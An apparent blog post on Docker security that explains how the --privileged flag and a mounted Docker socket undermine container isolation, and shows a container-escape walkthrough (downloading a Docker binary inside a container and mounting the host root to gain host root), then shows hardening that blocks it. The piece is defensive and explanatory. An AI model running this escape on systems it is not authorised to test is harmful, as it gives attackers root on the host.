Every article on container or Docker security will include an exhortation to drop user and container privileges as soon as possible, or to "treat root inside the container like root outside the container". The Docker Security page of the documentation for Docker contains this gem in the Conclusions section:
"Docker containers are, by default, quite secure; especially if you run your processes as non-privileged users inside the container."
This masterfully elides the fact that Docker will run container processes as root by default. Nonetheless, this is essentially true; the Docker security page is a testament to the effort expended to design security into the Docker container runtime.
Where there are potential attacks, the Docker team will tell you how to mitigate risk. The section on the attack surface of the Docker daemon, for instance, focuses on resource sharing between hosts and guest containers and includes this warning, one of the few bolded items on the page besides section headers:
"only trusted users should be allowed to control your Docker daemon"
This is because any user on the system capable of interacting with the Docker daemon can, for example, create a new container that mounts the host root partition ("/") to an arbitrary location inside the new container:
docker run -v /:/mnt --rm -it some_container_image:latest
The user does not even need to have permissions to read the root partition for this to succeed, because the Docker daemon needs to run as root on the host in order to do things like map ports and volumes. GTFOBINS has faithfully recorded and indexed this privilege escalation trick for any aspiring hackers to try out on their target systems. The Docker security page notes that there is a "rootless" operating mode available, but it requires additional configuration (i.e. is not enabled by default) and as of the time of writing is still considered "experimental".
A more thorough statement regarding Docker security defaults would include this information, but a disclaimer stating anyone with access to mount a volume to a container is effectively root sounds scary enough to make even the most ardent "move fast and break things" developer blink. As a defender, this may not even cause you much concern if the set of "users who can interact with the Docker daemon but are not already sudoers" is empty. Mitigating actions, be they technical (tightly restricting access to the docker group) or administrative (periodic user access reviews) can be taken at the host OS level to ensure unauthorized users cannot access the Docker daemon.
Where things really go awry, though, is when users move away from default Docker settings. There are unfortunately two very simple and frequently suggested ways you can completely obviate any security rendered to you by the default Docker container security measures.
The first is to run a Docker container with the --privileged flag. From the docs:
Emphasis is mine and is something I'd like you to keep in mind for later
By default, Docker containers are unprivileged and cannot, for example, run a Docker daemon inside a Docker container. This is because by default a container is not allowed to access any devices, but a privileged container is given access to all devices...
By default, Docker will provide a set of Linux capabilities to a container that includes SETUID, SETGID, and SYS_CHROOT, among others. This is why many security-conscious Docker instructions will have you drop all capabilities and then add back only those you need using the appropriate flags. For example, running fail2ban inside a container requires the NET_ADMIN capability added so it can modify the host's iptables rules. In order to enforce least privilege, you would run the container with these flags:
docker run --rm --cap-drop ALL --cap-add NET_ADMIN some_container_image:latest
But the privileged flag is different. Whereas capabilities allow individual actions, running a privileged container just bypasses kernel permission checks. Why oh why would anyone choose to use this flag instead of meting out individual capabilities?
Well it turns out that using Docker inside a Docker container is a fairly common development pattern that, up until recently, required the use of the privileged flag. According to Jerome Petazzoni, the developer who implemented the privileged flag Docker-in-Docker is desirable for its ability to create reproducible builds and for speeding up development, particularly in CI environments.
Thankfully, developments in the Docker ecosystem have diminished the need for the privileged flag. While it is still sometime used for running graphical applications inside containers, Jerome notes by mid-2020 the advent of sysbox makes the prospect of running nested Docker containers much safer. But at the very end of the article, Jerome mentions another possible solution for exposing Docker functions within a container: mounting the Docker socket so processes inside the container can interact with it to spawn "sibling" instead of "child" containers. This is, in fact, the second very simple and frequently suggested way to absolutely torpedo your containers' security. Whereas Docker-in-Docker is a development pattern that is most likely to be found on development machines not usually exposed to the Internet, mounting the Docker socket is a technique that is commonly used to set up production, Internet-facing machines. In fact, it is recommended in the quickstart for Traefik, which is where I first encountered it. In the demonstration below, I don't mean to pick on Traefik. The project makes the requisite security disclosure in the documentation and provides no fewer than seven options for hardening this configuration. However, I do think it's worth the effort to add a warning and a link on the quickstart page, because some percentage of users will inevitably read the quickstart, get Traefik working, and then close the page without diving further into the docs.
Mounting the Docker socket to a container enables all sorts of mischief. For example, if the Docker socket is mounted to a container and an attacker manages to get a shell via an application exploit, the attacker can quickly achieve access on the host machine using the GTFOBINS trick from above. The easiest way to interact with the socket from inside the container is to simply download a Docker static binary and issue the command.
On the host:
/# docker run --rm -v /var/run/docker.sock:/var/run/docker.sock:ro traefik:latest
Inside the container:
/# wget https://download.docker.com/linux/static/stable/x86_64/docker-18.06.3-ce.tgz -O - > docker.tgz && tar xzvf docker.tgz
/# docker/docker run -v /:/mnt --rm -it some_container_image:latest
/# whoami
root
And that's it. Since by default we are root inside the container, this allowed me to get root on the host filesystem. Note that the read-only directive (:ro) appended to the volume flag did absolutely nothing to prevent this attack. By contrast, using a non-root user and dropping unnecessary privileges inside the container will prevent, or at least substantially inhibit, an attacker trying to exploit this opening. Below, I attempt this attack inside a container I built based on a recent version of Python. During build time, I specified that the user inside the container should be UID 1000 instead of root. The image doesn't have wget, curl, nano or vim, but no matter, as it's easy enough to download a file using a combination of bash and Python:
On the host:
/# docker run ---cap-drop=ALL -v /var/run/docker.sock:/var/run/docker.sock:ro some_python_container:latest
Inside the container:
/# whoami
whoami: cannot find name for user ID 1000
/# echo -e 'import requests;
import os;
r = requests.get("https://download.docker.com/linux/static/stable/x86_64/docker-18.06.3-ce.tgz");
with open("docker.tgz","wb") as f:
\tf.write(r.content)
' > dock.py && python dock.py && tar xzvf docker.tgz
/# docker/docker ps
Got permission denied while trying to connect to the Docker daemon socket...
As expected, this time I got a permission denied error when attempting to enumerate the running containers. The Docker socket is owned by root and only available to users in the docker group; UID 1000 fits neither category. My attempt to chown the Docker socket (remember, CHOWN is a default Docker capability) similarly fails because I dropped all capabilities:
Inside the container:
/# chown /var/run/docker.sock 1000
chown: changing ownership of '/var/run/docker.sock': Operation not permitted
The examples above should provide clear justification for some of the most common Docker security "best practices". In production, Internet-facing containers, it is wise to:
If you must do one or more of the above for whatever reason, you had better be very confident about your application security. A misconfigured Docker container will make an attacker with a foothold smile as they escalate to the host machine's root user in one well-documented command.